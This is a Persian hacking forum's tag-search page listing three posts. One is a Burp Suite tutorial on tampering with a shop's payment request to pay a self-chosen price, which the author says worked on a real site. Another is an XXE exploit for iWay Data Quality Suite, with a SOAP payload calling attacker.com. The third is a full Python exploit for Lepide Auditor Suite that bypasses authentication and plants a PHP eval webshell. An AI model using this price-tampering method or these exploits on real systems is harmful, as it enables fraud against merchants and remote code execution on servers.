رفتن به مطلبiran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'suite'.تنظیمات بیشتر جستجو

 • جستجو بر اساس برچسب

  برچسب ها را با , از یکدیگر جدا نمایید.
 • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

 • انجمن های اصلی تیم
  • قوانین و اساسنامه ی انجمن
  • آخرین خبرها
  • اطلاعیه ها
  • مدیران
  • دوره های آموزشی
  • انتقادات پیشنهادات
 • آموزش های تخصصی
  • برنامه نویسی
  • هکینگ
  • امنیت
  • شبکه
  • سخت افزار
  • متفرقه
 • پرسش و پاسخ (FAQ)
  • سوالات و مشکلات پیرامون برنامه نویسی
  • سوالات و مشکلات پیرامون هکینگ
  • سوالات و مشکلات پیرامون امنیت
  • سوالات و مشکلات پیرامون شبکه
  • سوالات و مشکلات پیرامون سخت افزار
  • سوالات و مشکلات پیرامون سیستم عامل
  • سوالات و درخواست های متفرقه
 • سیستم عامل
 • بخش ویژه (مخصوص اعضای ویژه)
 • پروژه های تیم
 • مسابقات
 • عمومی
 • بحث آزاد علمی
 • بخش دریافت
 • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

 • شروع

  پایان


آخرین به روز رسانی

 • شروع

  پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

 • شروع

  پایان


گروه


درباره من


جنسیت


محل سکونت

3 نتیجه پیدا شد

 1. با سلام با اموزش تغییر قیمت محصولات با ابزار Burp suite با شما هستیم خب ابتدا مرورگر خود را باز کنید و در قسمت پروکسی های local خود را تظیم کنید (localhost:808) قبل از این که تنظیم بکنید ادرس سایتی که قصت هک کردنشو دارید رو باز کنید و بعد پروکسی را تنظیم کنید . ابزار Burp suite با زکنید . به قسمت proxy بروید و به بخش intercept بروید و گذینه intercept را on کنید بعد به مروگر خود باز گردید و محصولی که انتخواب کرده بودید را خرید را بزنید به Burp suite برگردید با دقت به کد ها نگاه کنید و اعداد در جایی که payment نوشته و قیمت محصول را نوشته و قیمت خود را وارد کرده و روی forward کلیک کنید الان به جایی میرسه که ازتون میگه سفارش را تایید میکنید بله را بزنید و به جای قیمت محصول قیمت انتخوابی شما را کثر کند . توجه : قبلا این روش را روی یکی از سایت های خارجی تست کردن جواب مثبت گرفتم . استفاده نادرست از اموزش بر عهده خود شخص است . با تشکر
 2. # Exploit Title: iWay Data Quality Suite Web Console 10.6.1.ga-2016-11-20 a XML External Entity Injection # Google Dork: N/A # Date: 2018-09-27 # Exploit Author: Sureshbabu Narvaneni# # Author Blog : https://nullnews.in # Vendor Homepage: www.informationbuilders.co.uk # Software Link: http://www.informationbuilders.co.uk/products/integrity/dqsuite # Affected Version: 10.6.1.ga # Category: WebApps # Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686 # CVE : N/A # Technical Description: # iWay Data Quality Suite Web Console provides web services features. As there is no # validation present on the web services featured by product while processing # the user input an attacker can easily inject external entities in the SOAP request and can # achieve the successful Remote Code Execution on the server # Proof Of Concept: > Access the iWay DQS Web Console application section. > Create an entry for web service and form a sample SOAP request. > Send below crafted request to the server to confirm the vulnerability <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://attacker.com/xxetest">]> <soapenv:Envelope xml:soapenv="http://schemas.xmlsoap.org/soap/envelope" xmlns:ws="http://www.example.com/ws"> <soapenv:Header/> <soapenv:Body> <ws:test> <ws:in>&xxe;</ws:in> </ws:test> </soapenv:Body> </soapenv:Envelope> > The below log shows that the web service component is vulnerable to XXE. root@MrR3boot:/var/www/html# tail -f /var/log/apache2/access.log 1xx.xx.xxx.xx - - [25/Sep/2018:01:13:42 -0400] "GET /xxetest HTTP/1.0" 404 474 "-" "-"
 3. #!/usr/bin/python """ Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution Vulnerability Vendor: http://www.lepide.com/ File: lepideauditorsuite.zip SHA1: 3c003200408add04308c04e3e0ae03b7774e4120 Download: http://www.lepide.com/lepideauditor/download.html Analysis: https://www.offensive-security.com/vulndev/auditing-the-auditor/ Summary: ======== The application allows an attacker to specify a server where a custom protocol is implemented. This server performs the authentication and allows an attacker to execute controlled SQL directly against the database as root. Additional code: ================ When I wrote this poc, I didn't combine the server and client into a single poc. So below is the client-poc.py code: root@kali:~# cat client-poc.py #!/usr/bin/python import requests import sys if len(sys.argv) < 3: print "(+) usage: %s <target> <attacker's server>" % sys.argv[0] sys.exit(-1) target = sys.argv[1] server = sys.argv[2] s = requests.Session() print "(+) sending auth bypass" s.post('http://%s:7778/' % target, data = {'servername':server, 'username':'whateva','password':'thisisajoke!','submit':''}, allow_redirects=False) print "(+) sending code execution request" s.get('http://%s:7778/genratereports.php' % target, params = {'path':'lol','daterange':'2@3','id':'6'}) Example: ======== root@kali:~# ./server-poc.py Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution by mr_me 2016 (+) waiting for the target... (+) connected by ('172.16.175.174', 50541) (+) got a login request (+) got a username: test (+) got a password: hacked (+) sending SUCCESS packet (+) send string successful (+) connected by ('172.16.175.174', 50542) (+) got a login request (+) got a username: test (+) got a password: hacked (+) sending SUCCESS packet (+) send string successful (+) got a column request (+) got http request id: 6 (+) got http request path: lol (+) send string successful (+) got a filename request (+) got http request daterange: 1@9 - 23:59:59 (+) got http request id: 6 (+) got http request path: lol (+) successfully sent tag (+) successfully sent file! (+) file sent successfully (+) done! Remote Code Execution: http://172.16.175.174:7778/offsec.php?e=phpinfo(); In another console: root@kali:~# ./client-poc.py 172.16.175.174 172.16.175.1 (+) sending auth bypass (+) sending code execution request """ import struct import socket from thread import start_new_thread import struct LOGIN = 601 COLUMN = 604 FILENAME = 603 VALID = 2 TAGR = 4 FILEN = 5 SUCCESS = "_SUCCESS_" def get_string(conn): size = struct.unpack(">i", conn.recv(4))[0] data = conn.recv(size).decode("utf-16") conn.send(struct.pack(">i", VALID)) return data def send_string(conn, string): size = len(string.encode("utf-16-le")) conn.send(struct.pack(">i", size)) conn.send(string.encode("utf-16-le")) return struct.unpack(">i", conn.recv(4))[0] def send_tag(conn, tag): conn.send(struct.pack(">i", TAGR)) conn.send(struct.pack(">i", tag)) return struct.unpack(">i", conn.recv(4))[0] def send_file(conn, filedata): if send_tag(conn, FILEN) == 2: print "(+) successfully sent tag" # send length of file conn.send(struct.pack(">i", len(filedata.encode("utf-16-le")))) # send the malicious payload conn.send(filedata.encode("utf-16-le")) if struct.unpack(">i", conn.recv(4))[0] == 2: print "(+) successfully sent file!" if send_tag(conn, VALID) == 2: return True return False def client_thread(conn): """ Let's put it this way, my mum's not proud of my code. """ while True: data = conn.recv(4) if data: resp = struct.unpack(">i", data)[0] if resp == 4: code = conn.recv(resp) resp = struct.unpack(">i", code)[0] # stage 1 if resp == LOGIN: print "(+) got a login request" # send a VALID response back conn.send(struct.pack(">i", VALID)) # now we expect to get the username and password print "(+) got a username: %s" % get_string(conn) print "(+) got a password: %s" % get_string(conn) # now we try to send to send a success packet print "(+) sending SUCCESS packet" if send_string(conn, SUCCESS) == 2: print "(+) send string successful" # stage 2 elif resp == COLUMN: print "(+) got a column request" # send a VALID response back conn.send(struct.pack(">i", VALID)) print "(+) got http request id: %s" % get_string(conn) print "(+) got http request path: %s" % get_string(conn) if send_string(conn, "foo-bar") == 2: print "(+) send string successful" # stage 3 - this is where the exploitation is elif resp == FILENAME: print "(+) got a filename request" conn.send(struct.pack(">i", VALID)) # now we read back 3 strings... print "(+) got http request daterange: %s" % get_string(conn) print "(+) got http request id: %s" % get_string(conn) print "(+) got http request path: %s" % get_string(conn) # exploit! if send_file(conn, "select '<?php eval($_GET[e]); ?>' into outfile '../../www/offsec.php';"): print "(+) file sent successfully" print "(+) done! Remote Code Execution: http://%s:7778/offsec.php?e=phpinfo();" % (addr[0]) break conn.close() HOST = '0.0.0.0' PORT = 1056 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(10) print "Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution" print "by mr_me 2016\t\n" print "(+) waiting for the target..." while True: # blocking call, waits to accept a connection conn, addr = s.accept() print '(+) connected by %s' % addr start_new_thread(client_thread, (conn,)) s.close()
×
×
 • جدید...